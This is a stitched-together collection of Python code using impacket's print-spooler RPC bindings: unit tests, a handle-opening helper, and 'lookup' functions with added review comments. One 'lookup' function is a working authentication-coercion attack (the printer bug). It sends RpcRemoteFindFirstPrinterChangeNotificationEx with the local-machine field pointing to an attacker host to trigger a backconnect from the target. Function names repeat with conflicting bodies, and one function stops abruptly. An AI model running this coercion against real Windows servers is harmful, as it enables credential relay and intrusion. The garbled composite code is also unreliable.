def test_hRpcRemoteFindFirstPrinterChangeNotificationEx(self):
    """Open a printer handle and call RpcRemoteFindFirstPrinterChangeNotificationEx on it.

    The test passes when the call succeeds or when the server answers with an
    error whose text contains ERROR_INVALID_HANDLE; any other exception is
    re-raised and fails the test.
    """
    dce, _transport = self.connect()
    printer_name = '\\\\%s\x00' % self.machine
    opened = rprn.hRpcOpenPrinter(dce, printer_name)
    try:
        notification = rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(
            dce,
            opened['pHandle'],
            rprn.PRINTER_CHANGE_ADD_JOB,
            pszLocalMachine=printer_name,
        )
        notification.dump()
    except Exception as err:
        # Only this one server error is tolerated; everything else is a failure.
        if 'ERROR_INVALID_HANDLE' not in str(err):
            raise
def test_hRpcRemoteFindFirstPrinterChangeNotificationEx(self):
    """Open a printer handle and expect RpcRemoteFindFirstPrinterChangeNotificationEx to be rejected.

    The server must answer with a DCERPCSessionError whose message contains
    ERROR_INVALID_HANDLE; success or any other error fails the test.
    """
    dce, _transport = self.connect()
    printer_name = "\\\\%s\x00" % self.machine
    opened = rprn.hRpcOpenPrinter(dce, printer_name)
    handle = opened['pHandle']
    expected_error = assertRaisesRegex(self, rprn.DCERPCSessionError, "ERROR_INVALID_HANDLE")
    with expected_error:
        rprn.hRpcRemoteFindFirstPrinterChangeNotificationEx(
            dce, handle, rprn.PRINTER_CHANGE_ADD_JOB, pszLocalMachine=printer_name)
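def call_open_printer(dce):
    """Open a printer handle on the module-level ``target`` over a bound DCE/RPC connection.

    Args:
        dce: a connected DCE/RPC object already bound by the caller.

    Returns:
        The ``pHandle`` context handle taken from the RpcOpenPrinter response.

    Side effects:
        Reads the module globals ``target`` and ``debug``. When the open fails
        the error is logged, the connection is closed and the process exits
        with a non-zero status (the original exited with 0, which made a
        failed open indistinguishable from success to the calling shell).
    """
    logging.info("getting context handle...")
    try:
        resp = rprn.hRpcOpenPrinter(dce, "\\\\%s\x00" % target)
    except Exception as e:
        logging.error("exception %s", e)
        dce.disconnect()
        sys.exit(1)
    if debug:
        logging.debug("raw response: ")
        resp.dump()
        # %-style args are only formatted when DEBUG is actually enabled.
        logging.debug("handle is: %s", binascii.hexlify(resp['pHandle']))
    return resp['pHandle']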
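def lookup(self, rpctransport, host):
    """Bind to the spooler on ``host``, open a printer handle and send the change-notification request.

    Args:
        rpctransport: transport whose ``get_dce_rpc()`` returns the DCE/RPC object to bind.
        host: hostname used for the optional TCP ping and for the printer name.

    Returns:
        None in every case; progress and failures are reported through ``logging``.

    Raises:
        The exception from ``hRpcOpenPrinter`` when its message contains neither
        'Broken pipe' nor ACCESS_DENIED.
    """
    if self.__tcp_ping and self.ping(host) is False:
        logging.info("Host is offline. Skipping!")
        return
    dce = rpctransport.get_dce_rpc()
    try:
        dce.connect()
    except Exception:
        # Probably this isn't a Windows machine or SMB is closed
        logging.error("Timeout - Skipping host!")
        return
    dce.bind(rprn.MSRPC_UUID_RPRN)
    logging.info('Bind OK')
    try:
        resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host)
    except Exception as e:
        message = str(e)
        if 'Broken pipe' in message:
            # The connection timed-out. Let's try to bring it back next round
            logging.error('Connection failed - skipping host!')
            return
        # str.find() returns -1 when the text is absent, and -1 is truthy: the
        # original `elif str(e).upper().find('ACCESS_DENIED'):` classified nearly
        # every error as access denied and left the re-raise unreachable.
        if 'ACCESS_DENIED' in message.upper():
            # We're not admin, bye
            logging.error('Access denied - RPC call was denied')
            dce.disconnect()
            return
        dce.disconnect()
        raise
    logging.info('Got handle')
    request = rprn.RpcRemoteFindFirstPrinterChangeNotificationEx()
    request['hPrinter'] = resp['pHandle']
    request['fdwFlags'] = rprn.PRINTER_CHANGE_ADD_JOB
    request['pszLocalMachine'] = '\\\\%s\x00' % self.__attackerhost
    request['pOptions'] = NULL
    try:
        dce.request(request)
    except Exception as e:
        print(e)
        logging.info(
            'Triggered RPC backconnect, this may or may not have worked')
    finally:
        # Close the session on both paths; the original left it open when the
        # request returned without an exception.
        dce.disconnect()
    return None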
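def lookup(self, rpctransport, host):
    """Connect and bind to the spooler on ``host`` and open a printer handle.

    Args:
        rpctransport: transport whose ``get_dce_rpc()`` returns the DCE/RPC object to bind.
        host: hostname used to build the printer name passed to RpcOpenPrinter.

    Returns:
        False when the open fails (the reason is logged); None when it succeeds.
        NOTE(review): the opened handle is neither returned nor closed here —
        as written the block ends right after hRpcOpenPrinter.
    """
    dce = rpctransport.get_dce_rpc()
    dce.connect()
    dce.bind(rprn.MSRPC_UUID_RPRN)
    # A successful bind is progress, not a critical condition (logged at INFO
    # like the sibling lookup implementation).
    logging.info('Bind OK')
    try:
        rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % host)
    except Exception as e:  # `except X, e` is Python-2-only; `as` works on 2.6+ and 3
        message = str(e)
        if 'Broken pipe' in message:
            # The connection timed-out. Let's try to bring it back next round
            logging.error('Connection failed - skipping host!')
            return False
        # str.find() returns -1 when the text is absent, and -1 is truthy: the
        # original `elif str(e).upper().find('ACCESS_DENIED'):` matched almost
        # every error, so the final branch was effectively unreachable.
        if 'ACCESS_DENIED' in message.upper():
            # We're not admin, bye
            logging.error('Access denied - RPC call was denied')
            dce.disconnect()
            return False
        # Other failures were returned as False without a trace; log them and
        # close the session so the failure is visible and nothing leaks.
        logging.error('RpcOpenPrinter failed: %s', e)
        dce.disconnect()
        return False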
def test_hRpcClosePrinter(self):
    """Open a printer handle on the test machine, dump it, then close it with RpcClosePrinter."""
    dce, _transport = self.connect()
    open_resp = rprn.hRpcOpenPrinter(dce, '\\\\%s\x00' % self.machine)
    open_resp.dump()
    close_resp = rprn.hRpcClosePrinter(dce, open_resp['pHandle'])
    close_resp.dump()